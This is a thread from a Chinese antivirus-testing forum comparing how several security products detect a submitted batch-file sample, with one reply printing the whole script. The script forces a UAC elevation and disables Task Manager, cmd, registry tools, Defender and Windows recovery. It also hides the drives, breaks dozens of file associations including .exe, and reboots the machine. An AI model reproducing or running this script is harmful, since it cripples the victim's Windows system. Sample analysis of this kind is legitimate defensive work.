搜索
楼主: xiaohuangbo
收起左侧

[病毒样本] 微步的新概念“安全” (1x)

  [复制链接]
心心相印
发表于 3 天前 | 显示全部楼层
md扫描&双击miss
netweb
发表于 3 天前 | 显示全部楼层
ESSP miss
ELG 安全可用







    生如夏花之绚烂,死如秋叶之静美  
    2022/1/15 下午7:32:23
    bye  
    From The Amazing Artifact:Netscape
             
    ICzcz
    发表于 3 天前 | 显示全部楼层
    netweb 发表于 2022-1-15 18:32
    ESSP miss
    ELG 安全可用

    这都安全???


    估计双击都会杀。。
    白崎桑
    发表于 3 天前 | 显示全部楼层

    KFA双击没反应...
    aiqinghe
    发表于 3 天前 | 显示全部楼层

    KES是杀得,KFA的主防应该没阉割吧咋会漏呢。。。
    5676
    发表于 3 天前 | 显示全部楼层
    emmmmm
    @echo off 2>nul 3>nul
    set /a _Debug=0
    ::==========================================
    :: 获取管理员权限
    set _Args=%*
    if "%~1" NEQ "" (
      set _Args=%_Args:"=%
    )
    fltmc 1>nul 2>nul || (
      cd /d "%~dp0"
      cmd /u /c echo Set UAC = CreateObject^("Shell.Application"^) : UAC.ShellExecute "cmd.exe", "/k cd ""%~dp0"" && ""%~dpnx0"" ""%_Args%""", "", "runas", 1 > "%temp%\GetAdmin.vbs"
      "%temp%\GetAdmin.vbs"
      del /f /q "%temp%\GetAdmin.vbs" 1>nul 2>nul
      exit
    )
    ::==========================================
    @Echo off
    %1(start /min cmd.exe /c %0 :&exit)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d "1" /f
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d "1" /f
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoLogoff" /t REG_DWORD /d "1" /f
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d "1" /f
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d "1" /f
    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HidePowerOptions" /t REG_DWORD /d "1" /f
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d "1" /f
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewOnDrive" /t REG_DWORD /d "67108863" /f
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDrives" /t REG_DWORD /d "67108863" /f
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDesktop" /t REG_DWORD /d "1" /f
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{088e3905-0323-4b02-9826-5d99428e115f}" /f
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{24ad3ad4-a569-4530-98e1-ab02f9417aa8}" /f
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{3dfdf296-dbec-4fb4-81d1-6a3438bcf4de}" /f
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{d3162b92-9365-467a-956b-92703aca08af}" /f
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a}" /f
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}" /f
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{0DB7E03F-FC29-4DC6-9020-FF41B59E513A}" /f
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "RestrictRun" /t REG_DWORD /d "1" /f
    reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d "1" /f
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "2" /f
    reagentc /disable
    assoc .exe=txtfile
    assoc .txt=exefile
    assoc .mp3=txtfile
    assoc .flv=txtfile
    assoc .swf=txtfile
    assoc .fla=txtfile
    assoc .jpg=txtfile
    assoc .bmp=txtfile
    assoc .zip=txtfile
    assoc .7z=txtfile
    assoc .rar=txtfile
    assoc .tag=txtfile
    assoc .jpge=txtfile
    assoc .mp4=txtfile
    assoc .3gp=txtfile
    assoc .avi=txtfile
    assoc .wav=txtfile
    assoc .htm=txtfile
    assoc .html=txtfile
    assoc .vbs=txtfile
    assoc .vbe=txtfile
    assoc .js=txtfile
    assoc .rxproj=txtfile
    assoc .mdb=txtfile
    assoc .dll=txtfile
    assoc .dat=txtfile
    assoc .sys=txtfile
    assoc .wmv=txtfile
    assoc .ogg=txtfile
    assoc .db=txtfile
    assoc .mid=txtfile
    assoc .gif=txtfile
    assoc .png=txtfile
    assoc .doc=txtfile
    assoc .exl=txtfile
    assoc .pdf=txtfile
    assoc .chm=txtfile
    assoc .nfo=txtfile
    assoc .bat=txtfile
    assoc .com=txtfile
    assoc .cmd=txtfile
    shutdown -r -t 0
    exit
    附:火绒

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?快速注册

    x
    心醉咖啡
    发表于 3 天前 | 显示全部楼层
    360

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?快速注册

    x
    小Q机器人
    发表于 3 天前 | 显示全部楼层
    Jirehlov1234 发表于 2022-1-15 17:27
    所有沙箱的综合评分之类的功能都是看个乐呵,真正可能有用的是具体的分析内容

    说的对,沙箱还是看行为,沙箱结论基本都不准。
    黑暗的背叛者
    发表于 前天 00:35 | 显示全部楼层
    这种不太好说,规则太严会把用户需要使用的bat脚本给杀了。这个是恶作剧,但里面很多注册表操作换个场景就是正常行为。
    整数环
    发表于 前天 01:11 | 显示全部楼层
    现在已经变成可疑了

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?快速注册

    x
    您需要登录后才可以回帖 登录 | 快速注册

    本版积分规则

    手机版|杀毒软件|软件论坛| 卡饭论坛

    Copyright © KaFan  KaFan.cn All Rights Reserved.

    Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2022-1-18 00:03 , Processed in 0.091977 second(s), 14 queries .

    卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

    快速回复 客服 返回顶部 返回列表